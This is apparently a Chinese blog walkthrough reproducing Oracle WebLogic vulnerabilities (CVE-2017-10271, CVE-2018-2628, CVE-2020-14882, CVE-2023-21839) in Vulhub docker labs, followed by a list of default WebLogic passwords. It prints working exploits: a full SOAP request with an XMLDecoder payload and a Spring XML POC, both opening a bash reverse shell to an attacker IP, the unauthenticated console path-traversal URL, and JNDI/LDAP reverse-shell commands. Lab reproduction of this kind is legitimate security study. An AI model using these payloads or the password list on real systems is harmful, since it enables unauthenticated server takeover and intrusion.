当前位置: 首页 > news >正文

Weblogic漏洞复现(Vulhub)

news 2024/11/2 13:11:53

0x00前言

1.docker 安装

Docker的安装_docker安装-CSDN博客

2.docker的镜像

1.可以在阿里云上的容器服务找到镜像源。

2.也可以使用下面的镜像源,时快时慢不稳定。

{"registry-mirrors":["https://docker.registry.cyou","https://docker-cf.registry.cyou","https://dockercf.jsdelivr.fyi","https://docker.jsdelivr.fyi","https://dockertest.jsdelivr.fyi","https://mirror.aliyuncs.com","https://dockerproxy.com","https://mirror.baidubce.com","https://docker.m.daocloud.io","https://docker.nju.edu.cn","https://docker.mirrors.sjtug.sjtu.edu.cn","https://docker.mirrors.ustc.edu.cn","https://mirror.iscas.ac.cn","https://docker.rainbond.cc"]
}

0x01CVE-2017-10271[XML反序列化]

Weblogic的WLS Security组件对外提供 webservice服务其中使用了XMLDecoder来 解析用户传入的XML数据在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令。
原理:https://xz.aliyun.com/t/10172

漏洞复现

1.进入漏洞页面

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.构造数据包 

POST /wls-wsat/CoordinatorPortType HTTP/1.1
#docker的IP
Host: 172.16.8.158:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml;charset=utf-8
Content-Length: 1012<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2">#kali监听主机的IP<string>bash -i &gt;&amp; /dev/tcp/172.16.8.132/2222 0&gt;&amp;1</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

3.kali拿到shell.

0x02CVE-2018-2628

Weblogic Server中的RMI 通信使用T3协议在Weblogic Server和其它Java程序(客户端或者其它Weblogic Server实例)之间传输数据, 服务器实例会跟踪连接到应用程序的每个Java虚拟机(JVM)中, 并创建T3协议通信连接, 将流量传输到Java虚拟机。T3协议在开放WebLogic控制台端口的应用上默认开启。攻击者可以通过T3协议发送恶意的的反序列化数据, 进行反序列化, 实现对存在漏洞的weblogic组件的远程代码执行攻击(开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的Weblogic Server WLS Core Components中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权限。)

漏洞复现

1.进入页面
http://172.16.8.160:7001/console/login/LoginForm.jsp 

2.判断服务是否开启

nmap -n -v -p 7001,7002 172.16.8.160 --script=weblogic-t3-info 

开启T3服务。 

3.使用工具,利用漏洞.

GitHub - KimJun1010/WeblogicTool: WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)

使用JRMP攻击

在本地执行命令即可。

Release v0.0.6 · frohoff/ysoserial · GitHub  工具。

 4.进入容器查看是否成功创建即可。

docker exec -it  cve-2018-2628-weblogic-1  /bin/bash

0x03CVE-2020-14882

Oracle WebLogic Server 远程代码执行漏洞 (CVE-2020-14882)POC 被公开,未经身份验证的远程攻击者可能通过构造特殊的 HTTP GET请求,利用该漏洞在受影响的 WebLogic Server 上执行任意代码。它们均存在于WebLogic的Console控制台组件中。此组件为WebLogic全版本默认自带组件,且该漏洞通过HTTP协议进行利用。将CVE-2020-14882和CVE-2020-14883进行组合利用后,远程且未经授权的攻击者可以直接在服务端执行任意代码,获取系统权限

漏洞复现

1.进入首页。

http://172.16.8.160:7001/console/login/LoginForm.jsp

2.未授权登陆。

console/images/%252E%252E%252Fconsole.portal

3.使用工具直接利用。  https://github.com/GGyao/CVE-2020-14882_ALL

 4.外置xml文件无回显命令执行

POC

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>/bin/bash</value><value>-c</value>#攻击机IP<value><![CDATA[bash -i >& /dev/tcp/172.16.8.132/54321  0>&1]]></value></list></constructor-arg></bean>
</beans>

 kali开启python监听。为了获取到POC.xml文件

nc开启监听。

nc -lvp  54321

执行命令。

成功反弹shell.

0x04CVE-2023-21839

RCE漏洞,该漏洞允许未经身份验证的远程,通过T3/IIOP协议网络访问并破坏WebLogic服务器,成功利用此漏洞可导致Oracle WebLogic服务器被接管,通过rmi/ldap远程协议进行远程命令执行,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,可能导致远程代码执行。

漏洞复现

1.进入页面

http://172.16.8.160:7001/console

2.kali监听 

Release 1.1 · 0x727/JNDIExploit · GitHub 利用工具 上传使用

java -jar JNDIExploit-1.3-SNAPSHOT.jar -i 172.16.8.132  # kaliIP

​​​​​​https://github.com/DXask88MA/Weblogic-CVE-2023-21839 漏洞EXP 

java -jar Weblogic-CVE-2023-21839.jar 192.168.111.6:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/192.168.111.14/9999

java -jar 目标服务器ip地址:端口 ldap地址/Basic/ReverseShell/ldap服务器IP地址/nc监听端口
 

需要跟换Java版本。

https://www.cnblogs.com/luoluostudy/p/18161115

java -jar Weblogic-CVE-2023-21839.jar 172.16.18.160:7001 ldap://192.168.111.14:1389/Basic/ReverseShell/172.16.8.132/9999

 查看LDAP服务器,成功获取

 工具使用​​​​​​​

0x05weak_password

常见弱口令。

system/password

weblogic/weblogic

admin/security

joe/password

mary/password

system/security

wlcsystem/wlcsystem

wlpisystem/wlpisystem

weblogic/weblogic123

weblogic/weblogic2

system/password

weblogic/weblogic

admin/security

joe/password

mary/password

system/security

wlcsystem/wlcsystem

wlpisystem/wlpisystem

guest/guest

portaladmin/portaladmin

system/system

WebLogic/WebLogic

weblogic/Oracle@123

weblogic/Oracle@123 


http://www.mrgr.cn/news/63980.html

相关文章:

  • web前端多媒体标签设置(图片,视频,音频)以及图片热区(usemap)的设置
  • 全新大模型框架Haystack,搭建RAG pipeline
  • 机器人领域中的scaling law:通过复现斯坦福机器人UMI——探讨数据规模化定律(含UMI的复现关键)
  • el-data-pick 选出的时间为2024-10-22T16:00:00.000Z样子的与期待的不符合 使用value-format解决
  • (9)位运算
  • SpringBoot【实用篇】- 热部署
  • 项目实战:基于Linux的Flappy bird游戏开发
  • Mac下载 安装MIMIC-IV 3.0数据集
  • 数据分析SPSS面试题及参考答案
  • 机器学习在运维中的应用
  • 多个JDK版本之间的切换
  • LeetCode 3226.使两个整数相等的位更改次数:位运算(接近O(1)的做法)
  • 基于现代 C++17 的模块化视频质量诊断处理流程优化设计
  • 【Window】无法登录G**gle解决方案
  • fastboot命令大全
  • liunx系统介绍
  • React第十三章(useTransition)
  • 【C++动态规划 01背包】1049. 最后一块石头的重量 II|2092
  • 矩阵的奇异值分解SVD
  • C++【string的模拟实现】
  • C语言学习,标准库 <stdarg.h>
  • World of Warcraft [CLASSIC][80][the Ulduar] BOSS 08 09 10 11
  • codeblocks-20.03mingw-setup.exe安装教程
  • “微软蓝屏”事件暴露了网络安全哪些问题?
  • 基于javase 的超市收银管理系统
  • 使用 OpenCV 在 Python 中绘制基本图形